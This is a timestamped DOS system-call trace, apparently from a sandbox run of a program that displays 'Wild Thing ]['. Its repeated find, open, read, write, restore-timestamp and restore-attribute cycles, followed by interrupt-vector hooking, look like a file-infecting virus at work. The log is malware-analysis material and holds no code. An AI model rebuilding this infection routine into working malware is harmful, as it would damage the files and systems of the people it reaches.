2018-12-25T12:42:11.055067022Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:11.06397222Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:11.066140047Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:11.088960647Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.092247987Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:11.096137244Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.099937581Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:11.110082271Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:11.11225474Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:11.122082283Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:11.135051321Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:11.138520449Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:11.145565685Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:11.158166016Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:11.16620238Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:11.168402709Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:11.1764969Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.178469578Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:11.181873003Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.18500144Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:11.194302161Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:11.19603269Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:11.205422622Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:11.21669606Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:11.219995432Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:11.227993348Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:11.239032306Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:11.246822162Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:11.24967646Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:11.257362879Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.258972617Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:11.261951776Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.264499525Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:11.273478102Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:11.274880465Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:11.287858396Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:11.299609898Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:11.302829555Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:11.309618649Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:11.320378205Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:11.327685663Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:11.330028493Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:11.337207184Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.338571051Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:11.342128098Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.344109946Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:11.353624171Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:11.356167817Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:11.364653101Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:11.375882435Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:11.379401437Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:11.385779553Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:11.396649035Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:11.409533095Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:11.411452802Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:11.418981729Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.420248772Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:11.426895958Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.428963828Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:11.439252423Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:11.442272673Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:11.451236211Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:11.462671271Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:11.467096948Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:11.473873626Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:11.485577339Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:11.494228919Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:11.496560676Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:11.504048494Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.505815067Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:11.50992092Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.5121567Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:11.521581548Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:11.524201961Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:11.532807291Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:11.543775286Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:11.547628805Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:11.554941303Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:11.566047502Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:11.574419957Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:11.576143041Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:11.582392322Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:11.584662327Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:11.592732249Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:11.603670011Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:11.606676596Z 59 PC: 12b48 | Change current directory
2018-12-25T12:42:11.611783452Z 59 PC: 12b52 | Change current directory
2018-12-25T12:42:11.614935862Z 26 PC: 12c51 | Set disk transfer address (See above)
2018-12-25T12:42:11.616468177Z 9 PC: 12b6a | Display string (String= 'Wild Thing ][ ')
2018-12-25T12:42:13.821229975Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T12:42:13.823447428Z 72 PC: 8f1bd | Allocate memory
2018-12-25T12:42:13.826244465Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-25T12:42:13.830152877Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-25T12:42:13.842299958Z 66 PC: 91f95 | Move file pointer
2018-12-25T12:42:13.844123815Z 62 PC: 91fc1 | Close file
2018-12-25T12:42:13.847243295Z 75 PC: 91fe0 | Execute program
2018-12-25T12:42:13.865315134Z 98 PC: 916f1 | Get current PSP
2018-12-25T12:42:13.866732434Z 9 PC: c605 | Display string (String= '6��r�&;] u')
2018-12-25T12:42:13.872053542Z 48 PC: c609 | Get DOS version
2018-12-25T12:42:13.875570965Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-25T12:42:13.878341835Z 2 PC: c38c | Character output (Char = '32')
2018-12-25T12:42:13.885724649Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-25T12:42:13.88919594Z 9 PC: c6d9 | Display string (String= '�����VH�VD���V@��������������_���Ku��t1��������D�����t �� ��������a1��Z�����W���� ������5���|�����(���������Nj�(��������p�^')
2018-12-25T12:42:13.891862814Z 9 PC: c6e0 | Display string (String= '�5���|�����(���������Nj�(��������p�^')
2018-12-25T12:42:13.895642751Z 61 PC: 91f88 | Open file (See above)
2018-12-25T12:42:13.904890587Z 66 PC: 91f95 | Move file pointer (See above)
2018-12-25T12:42:13.906198195Z 62 PC: 91fc1 | Close file (See above)
2018-12-25T12:42:13.908427386Z 75 PC: 91fe0 | Execute program (See above)
2018-12-25T12:42:13.924626827Z 98 PC: 916f1 | Get current PSP (See above)
2018-12-25T12:42:13.929706748Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
2018-12-25T12:42:13.932226694Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:42:13.933472684Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:42:13.934368374Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:13.935843968Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:13.937142539Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-25T12:42:13.942561701Z 62 PC: 8f8eb | Close file
2018-12-25T12:42:13.945209611Z 62 PC: 8f8f2 | Close file
2018-12-25T12:42:13.947414883Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.948631568Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.950714026Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.952534541Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.953734094Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.954948003Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.956876943Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.960367682Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.962688132Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.968495604Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.978061527Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.979890176Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.983191241Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.985162235Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.987366281Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.989936708Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.991648574Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.993489026Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.99641754Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.998465366Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:14.000572606Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:14.003777666Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:14.005567605Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:14.012282561Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:14.026297625Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:14.028504338Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:14.030632566Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:14.034716176Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:14.0368377Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:14.038933662Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-25T12:42:14.045932764Z 62 PC: 8f90e | Close file
2018-12-25T12:42:14.048251056Z 69 PC: 8f915 | Duplicate handle
2018-12-25T12:42:14.05086946Z 69 PC: 8f919 | Duplicate handle
2018-12-25T12:42:14.053494795Z 61 PC: 9387b | Open file (Filename = '')
2018-12-25T12:42:14.059471175Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-25T12:42:14.061425584Z 61 PC: 9387b | Open file (See above)
2018-12-25T12:42:14.067020362Z 68 PC: 9386b | I/O control for devices (See above)
2018-12-25T12:42:14.069314695Z 74 PC: 8f9c4 | Reallocate memory
2018-12-25T12:42:14.070981856Z 72 PC: 8f9e0 | Allocate memory
2018-12-25T12:42:14.072878169Z 72 PC: 8f9e4 | Allocate memory
2018-12-25T12:42:14.074639309Z 74 PC: 8f9fb | Reallocate memory
2018-12-25T12:42:14.076473314Z 72 PC: 8fa02 | Allocate memory
2018-12-25T12:42:14.078799112Z 72 PC: 8fa06 | Allocate memory
2018-12-25T12:42:14.082386084Z 73 PC: 8fa11 | Release memory
2018-12-25T12:42:14.084546876Z 73 PC: 8efea | Release memory
2018-12-25T12:42:14.086561461Z 74 PC: 8f003 | Reallocate memory
2018-12-25T12:42:14.091158484Z 72 PC: 8f054 | Allocate memory
2018-12-25T12:42:14.093477854Z 72 PC: 8f058 | Allocate memory
2018-12-25T12:42:14.095544859Z 73 PC: 8f060 | Release memory
2018-12-25T12:42:14.098457441Z 61 PC: 8f080 | Open file (Filename = '')
2018-12-25T12:42:14.10948702Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:42:14.116854263Z 66 PC: 8f0ad | Move file pointer
2018-12-25T12:42:14.119749343Z 62 PC: 8f0d1 | Close file
2018-12-25T12:42:14.12250696Z 75 PC: 8f0f2 | Execute program
2018-12-25T12:42:14.146559068Z 80 PC: 12be9 | Set current PSP
2018-12-25T12:42:14.148473698Z 48 PC: 12bee | Get DOS version
2018-12-25T12:42:14.15034264Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-25T12:42:14.153516423Z 101 PC: 12c74 | Get extended country info
2018-12-25T12:42:14.155740871Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-25T12:42:14.157225572Z 74 PC: 12cdc | Reallocate memory
2018-12-25T12:42:14.159049579Z 72 PC: 1355d | Allocate memory
2018-12-25T12:42:14.161042435Z 25 PC: 13596 | Get default drive
2018-12-25T12:42:14.163018666Z 71 PC: 135ad | Get current directory
2018-12-25T12:42:14.165668392Z 59 PC: 135ba | Change current directory
2018-12-25T12:42:14.171503952Z 59 PC: 135c8 | Change current directory
2018-12-25T12:42:14.178866327Z 59 PC: 135d3 | Change current directory
2018-12-25T12:42:14.184695168Z 25 PC: 12d13 | Get default drive
2018-12-25T12:42:14.186143754Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T12:42:14.18908905Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T12:42:14.190718935Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:42:14.193531602Z 80 PC: 1301d | Set current PSP
2018-12-25T12:42:14.196081265Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag')
2018-12-25T12:42:14.198008991Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:14.199996301Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:14.202245594Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-25T12:42:14.205128245Z 72 PC: 130ec | Allocate memory
2018-12-25T12:42:14.207498031Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-25T12:42:14.214773692Z 62 PC: 131ba | Close file
2018-12-25T12:42:14.217288056Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-25T12:42:14.21881612Z 74 PC: 1197c | Reallocate memory
2018-12-25T12:42:14.221348368Z 72 PC: 11991 | Allocate memory
2018-12-25T12:42:14.223462057Z 73 PC: 119b2 | Release memory
2018-12-25T12:42:14.225226514Z 72 PC: 119bd | Allocate memory
2018-12-25T12:42:14.228337139Z 73 PC: 119df | Release memory
2018-12-25T12:42:14.230386469Z 72 PC: 119f5 | Allocate memory
2018-12-25T12:42:14.232866219Z 72 PC: 119fd | Allocate memory